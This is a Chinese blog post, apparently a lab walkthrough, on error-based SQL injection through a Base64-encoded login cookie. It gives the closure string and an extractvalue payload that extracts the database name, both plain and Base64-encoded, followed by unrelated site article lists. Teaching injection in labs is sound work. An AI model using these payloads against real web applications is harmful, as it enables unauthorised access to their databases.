Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)

(1)登录成功后有以下页面:

其中红圈内的字符为admin的BASED64编码后的字符。

(2)用burp抓包,再刷新浏览器。

寻找闭合方式:明文:admin' --+ based64编码:YWRtaW4nICAtLSs=

闭合方式为' )

(3)开始报错注入,需要将payload用based63编码输入。例如:爆表名

admin') and extractvalue(1,concat(0x7e,(select database())))and ('

编码:

YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSkpYW5kICgn

最新文章

  1. [LeetCode] Power of Two 判断2的次方数
  2. WhaleSong
  3. GZAPI框架初识
  4. 对IEnumerable<T>和IQueryable<T>的一点见解
  5. QT在windows下实现截屏操作并保存为png图片
  6. vs2012编译出错“LC.exe”已退出解决方法
  7. spoj 2178
  8. Performance Counter的使用
  9. ArrayList实现根据某属性大小相间排序
  10. Impala中的代码生成技术
  11. Java建造者模式
  12. mysql-笔记-默认值
  13. CSS属性速查表
  14. 阿里云,未找到或无法访问服务器.请验证实例名称是否正确并且 SQL Server 已配置为允许远程连接.
  15. php 创建返回结果配置文件 实例
  16. mysql系列四、mySQL四舍五入函数用法总结
  17. thrift使用案例
  18. Python.Flask.0
  19. iOS常用第三方类库及Xcode插件
  20. springboot之websocket,STOMP协议

热门文章

  1. S2T40,第五章
  2. linux安装anaconda3 conda: command not found
  3. Dubbo源码构建
  4. 软工作业(JAVA)
  5. 破解某PDF转换器产品
  6. MyBatis工具类
  7. 将float数据类型转换为str
  8. Docker搭建LNMP网站平台
  9. 如何将Excel转换成Markdown表格[转]
  10. git pull提交代码遇到的问题